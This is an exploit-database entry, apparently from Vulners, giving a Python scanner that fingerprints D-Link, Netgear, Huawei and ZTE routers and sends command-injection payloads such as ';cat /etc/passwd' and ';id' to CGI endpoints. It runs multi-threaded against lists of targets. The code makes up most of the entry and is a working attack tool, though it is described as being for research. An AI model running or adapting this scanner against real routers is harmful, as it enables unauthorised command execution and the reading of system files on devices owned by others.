Vulners
Lucene search
📄 Router Fingerprint / Command Injection Scanner
=============================================================================================================================================
| # Title : IoT Multi-Router Auto Fingerprint Command Injection Scanner |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : indoushka |
=============================================================================================================================================
[+] Summary : This Python tool is designed to automatically identify the vendor of IoT routers through HTTP fingerprinting and attempt command-injection testing using vendor-specific payloads.
The scanner analyzes HTTP headers and response bodies to detect device signatures from common manufacturers such as D-Link, Netgear, Huawei, and ZTE. If direct fingerprinting fails, it performs firmware path probing to infer the device type.
After identifying the likely vendor, the tool selects payloads tailored to that platform and sends crafted requests to commonly vulnerable CGI endpoints (e.g., /cgi-bin/admin.cgi, /setup.cgi, /ping.cgi).
The goal is to determine whether command execution is possible by detecting indicators such as /etc/passwd content or uid= output in responses.
The scanner supports multi-threaded target processing, allowing efficient testing of large target lists. It is primarily intended for security research and vulnerability assessment of
IoT routers, helping researchers quickly identify devices that may be susceptible to command injection vulnerabilities.
Key Features:
Automatic IoT router vendor fingerprinting
Firmware path probing when fingerprinting fails
Vendor-specific payload selection
Testing of common command injection endpoints
Detection of potential remote command execution
Multi-threaded scanning for large target lists
Supports routers from D-Link, Netgear, Huawei, and ZTE
Use Case: This script can assist security researchers and penetration testers in identifying misconfigured or vulnerable IoT router interfaces that may expose command injection flaws through their web management interfaces.
[+] POC : #!/usr/bin/env python3
import requests
import sys
import threading
import queue
requests.packages.urllib3.disable_warnings()
timeout = 5
SIGNATURES = {
"D-Link": [
"d-link",
"dir-",
"dlinkrouter",
"dlink"
],
"Netgear": [
"netgear",
"r7000",
"wndr"
],
"Huawei": [
"huaweihomegateway",
"hg532",
"huawei"
],
"ZTE": [
"zte",
"zxhn",
"f660"
]
}
FIRMWARE_PATHS = {
"D-Link": [
"/cgi-bin/login.cgi",
"/HNAP1/"
],
"Netgear": [
"/currentsetting.htm",
"/setup.cgi"
],
"Huawei": [
"/html/index.html",
"/login.asp"
],
"ZTE": [
"/login.asp",
"/web_shell_cmd.gch"
]
}
PAYLOADS = {
"D-Link": [
";cat /etc/passwd",
"|cat /etc/passwd",
";id"
],
"Netgear": [
"`cat /etc/passwd`",
";uname -a",
"|id"
],
"Huawei": [
";ls",
"|id",
";cat /proc/version"
],
"ZTE": [
";cat /proc/version",
"|id",
";uname -a"
]
}
def http_get(url):
try:
r = requests.get(url, timeout=timeout, verify=False)
return r
except:
return None
def fingerprint_device(target):
r = http_get(target)
if not r:
return "Unknown"
headers = str(r.headers).lower()
body = r.text.lower()
for vendor in SIGNATURES:
for sig in SIGNATURES[vendor]:
if sig in headers or sig in body:
return vendor
return "Unknown"
def detect_firmware(target):
for vendor in FIRMWARE_PATHS:
for path in FIRMWARE_PATHS[vendor]:
url = target + path
r = http_get(url)
if r and r.status_code == 200:
return vendor
return "Unknown"
def choose_payload(vendor):
if vendor in PAYLOADS:
return PAYLOADS[vendor]
return []
def attempt_exploit(target, payload):
urls = [
"/cgi-bin/admin.cgi?cmd=",
"/setup.cgi?cmd=",
"/ping.cgi?ip="
]
for u in urls:
url = target + u + payload
r = http_get(url)
if not r:
continue
if "root:" in r.text or "uid=" in r.text:
print("[+] Command Execution Possible")
print("[+] Payload:", payload)
print("[+] URL:", url)
return True
return False
def scan_target(target):
print("\n[*] Target:", target)
vendor = fingerprint_device(target)
print("[*] Fingerprint:", vendor)
if vendor == "Unknown":
vendor = detect_firmware(target)
print("[*] Firmware Guess:", vendor)
payloads = choose_payload(vendor)
if not payloads:
print("[-] No payloads available")
return
for payload in payloads:
if attempt_exploit(target, payload):
break
def worker(q):
while True:
target = q.get()
if target is None:
break
scan_target(target)
q.task_done()
def main():
if len(sys.argv) < 2:
print("Usage:")
print("python iot_scanner.py targets.txt")
sys.exit(0)
file = sys.argv[1]
with open(file) as f:
targets = [x.strip() for x in f if x.strip()]
q = queue.Queue()
threads = []
for i in range(10):
t = threading.Thread(target=worker, args=(q,))
t.start()
threads.append(t)
for target in targets:
q.put(target)
q.join()
for i in range(10):
q.put(None)
for t in threads:
t.join()
if __name__ == "__main__":
main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Mar 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9